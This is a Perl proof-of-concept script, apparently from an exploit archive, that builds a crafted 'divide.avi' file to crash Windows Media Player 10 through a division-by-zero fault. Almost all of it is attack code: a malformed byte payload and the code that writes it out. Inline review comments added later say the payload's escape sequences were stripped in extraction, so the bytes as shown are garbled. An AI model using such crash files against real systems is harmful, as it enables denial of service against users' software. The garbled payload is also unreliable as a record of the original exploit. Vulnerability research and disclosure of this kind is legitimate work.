
# Title : Windows Media Player 10 .avi Integer Division By Zero Crash PoC
# Published : 2012-10-15
# Author :


#!/usr/bin/perl

# Souhail Hammou - Independent Security Researcher & Penetration Tester .
# Facebook : www.facebook.com/dark.puzzle.sec
# E-mail   : dark-puzzle@live.fr
# Greetings to all moroccan researchers and white hats .

# Title  : Windows Media Player 10 - .avi Integer Division By Zero Vulnerability
# Author : Dark-Puzzle (Souhail Hammou)
# Type   : DoS/PoC
# Risk   : Medium
# Vendor : Microsoft
# Versions : 10 ; other versions may be vulnerable .
# Tested On : Windows XP SP2 .
# Date : 13 October 2012
# ---------------------------------------------------------- #
# Vulnerability Details : 
# The division-by-zero vulnerability in Microsoft Windows Media Player consists of dividing the value of a register by zero .
# In this case it is the ECX register, through a DIV ECX instruction .
# This causes an integer division by zero --> an exception that is not handled --> CRASH .
# Tested Just On Version "10" Might be working on other Versions .

# POC :


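use strict;
use warnings;

# Four-byte header written at the start of the output file.
# NOTE(review): "MThd" is the Standard MIDI File header chunk id, not a
# RIFF/AVI signature, although the output is named divide.avi -- so the
# parser evidently keys off content rather than extension; verify against
# the original submission before relying on this detail.
my $m = "MThd";

# Bytes following the header. The "x00"-style tokens are reproduced exactly
# as this page shows them; the backslashes of the original "\x.." escapes
# appear to have been lost in extraction, so as written this emits ASCII
# text rather than raw bytes.
my $div =
"x00x00x00x06x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00xffxffx00xffx00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x06x00x00x00x66x66x66x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00".
"x00x00x00x00x00x00xffxffxffx00x00x00x00x00";

# Three-argument open on a lexical handle, checked for failure. The original
# used a bareword handle with two-argument open (the mode is parsed out of
# the filename string) and never checked open or close, so a permission or
# disk error would silently leave no file or a truncated one.
open(my $out, '>', 'divide.avi') or die "open divide.avi: $!";
# Raw byte output: disable any newline translation on Windows so the file
# contents are written verbatim.
binmode($out);
print {$out} $m . $div;
# Buffered write errors only surface at close, so check it too.
close($out) or die "close divide.avi: $!";

# Status messages, reproduced as the page shows them (trailing "n" tokens
# look like "\n" escapes with the backslash lost in extraction).
print "Windows Media Player 10 - .avi Integer Division By Zero Vulnerabilityn";
print "x44x69x73x63x6Fx76x65x72x65x64x20x26x20x50x6Fx43x20x42x79x20x44x61x72x6Bx2Dx50x75x7Ax7Ax6Cx65n";
# Printed after the file has already been written and closed; the sleep
# that follows delays exit only and does not wait on any I/O.
print "Creating File Please Waitn";
sleep 5;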